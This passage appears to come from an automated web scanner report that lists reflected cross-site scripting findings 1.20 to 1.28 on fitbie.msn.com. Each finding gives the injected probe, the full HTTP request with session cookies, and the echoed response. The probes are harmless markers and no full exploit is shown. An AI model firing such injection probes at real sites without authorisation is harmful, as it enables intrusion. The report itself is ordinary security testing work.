<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/drupal.jsbe070';5b4d8fa22b6?destination=node%2Fdrupal.jsbe070';5b4d8fa22b6&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.20. http://fitbie.msn.com/misc/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /misc/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f964'%3bec2bdcccb09 was submitted in the REST URL parameter 2. This input was echoed as 8f964';ec2bdcccb09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/favicon.ico8f964'%3bec2bdcccb09 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; s_cc=true; s_sq=%5B%5BB%5D%5D; fsbstat=1; fsbrelated=%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%20title%3D%225%20Ways%20to%20Do%20Anything%20Better%22%3E5%20Ways%20to%20Do%20Anything%20Better%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%3E%3Cimg%20src%3D%22/sites/default/files/beet-roots-cutting-board-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%20title%3D%226%20Ways%20to%20Lose%20Weight%20Naturally%20Before%20Your%20Wedding%22%3E6%20Ways%20to%20Lose%20Weight%20Naturally%20Before...%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%3E%3Cimg%20src%3D%22/sites/default/files/bride-slim-healthy-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%20title%3D%226%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%22%3E6%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%3E%3Cimg%20src%3D%22/sites/default/files/guilty-chocolate-snack-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%20title%3D%228%20Ridiculously%20Cheap%20Healthy%20Foods%22%3E8%20Ridiculously%20Cheap%20Healthy%20Foods%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%3E%3Cimg%20src%3D%22/sites/default/files/potatoes-assorted-th.jpg%22%20/%3E%3C/a%3E

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:04 GMT
Date: Sun, 13 Feb 2011 14:18:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/favicon.ico8f964';ec2bdcccb09?destination=node%2Ffavicon.ico8f964';ec2bdcccb09&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.21. http://fitbie.msn.com/misc/progress.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /misc/progress.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62d8d'%3bc8e41c08d31 was submitted in the REST URL parameter 2. This input was echoed as 62d8d';c8e41c08d31 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/progress.js62d8d'%3bc8e41c08d31?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/progress.js62d8d';c8e41c08d31?destination=node%2Fprogress.js62d8d';c8e41c08d31&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.22. http://fitbie.msn.com/modules/node/node.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf5cc'%3bd185d67b297 was submitted in the REST URL parameter 2. This input was echoed as bf5cc';d185d67b297 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/nodebf5cc'%3bd185d67b297/node.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:17:59 +0000
ETag: "1297606679-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:17:59 GMT
Date: Sun, 13 Feb 2011 14:17:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/nodebf5cc';d185d67b297?destination=node%2Fnodebf5cc';d185d67b297&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.23. http://fitbie.msn.com/modules/system/defaults.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b616'%3b7f3637daab was submitted in the REST URL parameter 2. This input was echoed as 6b616';7f3637daab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system6b616'%3b7f3637daab/defaults.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:02 +0000
ETag: "1297606682-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:03 GMT
Date: Sun, 13 Feb 2011 14:18:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/system6b616';7f3637daab?destination=node%2Fsystem6b616';7f3637daab&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.24. http://fitbie.msn.com/modules/system/system-menus.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload decf5'%3bf569e407f47 was submitted in the REST URL parameter 2. This input was echoed as decf5';f569e407f47 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/systemdecf5'%3bf569e407f47/system-menus.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:03 +0000
ETag: "1297606683-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:04 GMT
Date: Sun, 13 Feb 2011 14:18:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/systemdecf5';f569e407f47?destination=node%2Fsystemdecf5';f569e407f47&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.25. http://fitbie.msn.com/modules/system/system.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10c9'%3baccde2a0003 was submitted in the REST URL parameter 2. This input was echoed as d10c9';accde2a0003 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/systemd10c9'%3baccde2a0003/system.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:06 +0000
ETag: "1297606686-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:07 GMT
Date: Sun, 13 Feb 2011 14:18:07 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/systemd10c9';accde2a0003?destination=node%2Fsystemd10c9';accde2a0003&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.26. http://fitbie.msn.com/modules/taxonomy/taxonomy.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /modules/taxonomy/taxonomy.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f3c'%3b8d3626cc255 was submitted in the REST URL parameter 2. This input was echoed as f1f3c';8d3626cc255 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/taxonomyf1f3c'%3b8d3626cc255/taxonomy.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/taxonomy/term/117
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:40 +0000
ETag: "1297607740-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:40 GMT
Date: Sun, 13 Feb 2011 14:35:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/taxonomyf1f3c';8d3626cc255?destination=node%2Ftaxonomyf1f3c';8d3626cc255&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.27. http://fitbie.msn.com/modules/user/user.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4155b'%3b1d3f4d4d3fe was submitted in the REST URL parameter 2. This input was echoed as 4155b';1d3f4d4d3fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/user4155b'%3b1d3f4d4d3fe/user.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/user4155b';1d3f4d4d3fe?destination=node%2Fuser4155b';1d3f4d4d3fe&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.28. http://fitbie.msn.com/node/4411 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /node/4411

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e29'%3bac45156e9a was submitted in the REST URL parameter 2. This input was echoed as c3e29';ac45156e9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/4411c3e29'%3bac45156e9a HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:38:19 +0000
ETag: "1297607899-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Mon, 14 Feb 2011 02:38:20 GMT
Date: Sun, 13 Feb 2011 14:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
